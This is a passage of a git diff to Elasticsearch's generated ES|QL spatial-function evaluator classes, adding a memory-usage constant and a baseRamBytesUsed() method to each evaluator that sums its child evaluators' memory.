+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoPointDocValuesAndSourceEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoPointDocValuesAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -51,6 +54,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java
index 44e7b49ded915..26c3662cbd9f9 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndConstantEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoSourceAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java
index 3bf5b1499ebe7..2799510889a59 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StDistanceGeoSourceAndSourceEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StDistanceGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StDistanceGeoSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java
index ca79afe188d09..c10b9378d4a8f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StEnvelopeFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StEnvelopeFromWKBEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;
 
   public StEnvelopeFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -117,6 +120,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java
index 467ff07588092..d672d06a2771d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StEnvelopeFromWKBGeoEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StEnvelopeFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StEnvelopeFromWKBGeoEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;
 
   public StEnvelopeFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -117,6 +120,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java
index 2e4b8e7d538d8..62ce07e4dcd61 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohashFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldAndLiteralAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator in;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, BytesRefBlock inBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java
index c67d7e4855299..b1cdd199289c2 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohashFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator wkbBlock;
@@ -47,6 +50,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkbBlock.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
index 862b2b90c9b2d..aecfacf2f63bf 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.Page;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldDocValuesAndLiteralAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator encoded;
@@ -47,6 +50,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += encoded.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock encodedBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java
index a57c2559093bf..2a00d86f9770e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashFromFieldDocValuesAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.Page;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohashFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashFromFieldDocValuesAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator encoded;
@@ -46,6 +49,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += encoded.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock encodedBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java
index 640a77fe05fb9..61f82764e525d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToLongFromStringEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StGeohashToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashToLongFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator gridId;
 
   public StGeohashToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId,
@@ -103,6 +106,13 @@ public void close() {
     Releasables.closeExpectNoException(gridId);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += gridId.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java
index 3e33f376e4e7e..440a2a6456d17 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohashToStringFromLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StGeohashToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohashToStringFromLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator gridId;
 
   public StGeohashToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId,
@@ -101,6 +104,13 @@ public void close() {
     Releasables.closeExpectNoException(gridId);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += gridId.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java
index 24e070c46adda..90398d9e10005 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohexFromFieldAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldAndLiteralAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator in;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, BytesRefBlock inBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java
index 5209d32caf308..84b7af176bef4 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohexFromFieldAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator wkbBlock;
@@ -47,6 +50,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkbBlock.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, BytesRefBlock wkbBlockBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
index 0ac32cbdbedad..fe03076f760d0 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.Page;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldDocValuesAndLiteralAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator encoded;
@@ -47,6 +50,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += encoded.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock encodedBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java
index 2b7d48d5f159d..63668c69bcc28 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexFromFieldDocValuesAndLiteralEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.Page;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class StGeohexFromFieldDocValuesAndLiteralEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexFromFieldDocValuesAndLiteralEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator encoded;
@@ -46,6 +49,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += encoded.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock encodedBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java
index 815b5c9cb9015..b04e0bdceef4e 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToLongFromStringEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class StGeohexToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeohexToLongFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator gridId;
 
   public StGeohexToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId,
@@ -103,6 +106,13 @@ public void close() {
     Releasables.closeExpectNoException(gridId);
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += gridId.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
 
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java
index 9806e85ef6a48..ad5094b0de795 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeohexToStringFromLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
